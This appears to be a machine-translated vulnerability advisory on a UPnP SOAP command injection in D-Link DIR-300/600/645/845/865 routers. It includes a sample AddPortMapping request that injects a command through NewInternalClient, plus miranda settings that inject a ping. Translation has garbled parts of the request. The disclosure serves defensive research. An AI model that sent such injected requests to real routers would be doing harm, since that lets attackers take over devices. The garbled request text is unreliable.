Release date:
Updated on:
Affected Systems:
D-Link DIR-300
D-Link DIR-600 2.12b02
D-Link DIR-645
D-Link DIR-865L 1.05b03
D-Link DIR-845 1.01b02
Description:
--------------------------------------------------------------------------------
Bugtraq id: 61005
D-Link is a world-renowned provider of network devices and solutions. Its products include a variety of router devices.
Multiple D-Link products have the command injection vulnerability, which allows attackers to execute arbitrary commands in the context of the affected device. Affected devices include:
DIR-300 rev B running firmware 2.14b01
DIR-600 running firmware running B01
DIR-645 running firmware 1.04b01
DIR-845 running firmware 1.01b02
DIR-865 running firmware 1.05b03
<* Source: m-1-k-3
Link: http://xforce.iss.net/xforce/xfdb/85461
Http://packetstormsecurity.com/files/122307/D-Link-UPnP-OS-Command-Injection.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
=> Parameter: NewInternalClient, NewInternalClient, NewInternalPort
Example Request:
POST/soap. cgi? Service = WANIPConn1 HTTP/1.1
SOAPAction: "urn: schemas-upnp-org: service: WANIPConnection: 1 # AddPortMapping"
Host: 10.8.28.htm: 49152
Content-Type: text/xml
Content-Length: 649
<? Xml version = "1.0"?>
<SOAP-ENV: Envelope xmlns: SOAP-ENV = "http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV: encodingStyle = "http://schemas.xmlsoap.org/soap/encoding/">
SOAP-ENV: Body>
<M: AddPortMapping xmlns: m = "urn: schemas-upnp-org: service: WANIPConnection: 1">
<NewPortMappingDescription> </NewPortMappingDescription>
<NewLeaseDuration> </NewLeaseDuration>
<NewInternalClient> 'command' </NewInternalClient>
<NewEnabled> 1 </NewEnabled>
<NewExternalPort> 634 </NewExternalPort>
<NewRemoteHost> </NewRemoteHost>
<NewProtocol> TCP </NewProtocol>
<NewInternalPort> 45 </NewInternalPort>
</M: AddPortMapping>
SOAP-ENV: Body>
SOAP-ENV: Envelope>
You cocould use miranda for your own testing:
* NewInternalClient
Required argument:
Argument Name: NewInternalClient
Data Type: string
Allowed Values: []
Set NewInternalClient value to: 'Ping 192.168.0.100'
* NewExternalPort
Required argument:
Argument Name: NewExternalPort
Data Type: ui2
Allowed Values: []
Set NewExternalPort value to: 'Ping 192.168.0.100'
* NewInternalPort
Required argument:
Argument Name: NewInternalPort
Data Type: ui2
Allowed Values: []
Set NewInternalPort value to: 'Ping 192.168.0.100'
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/dir-865-v105-shell.png
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.dlink.com/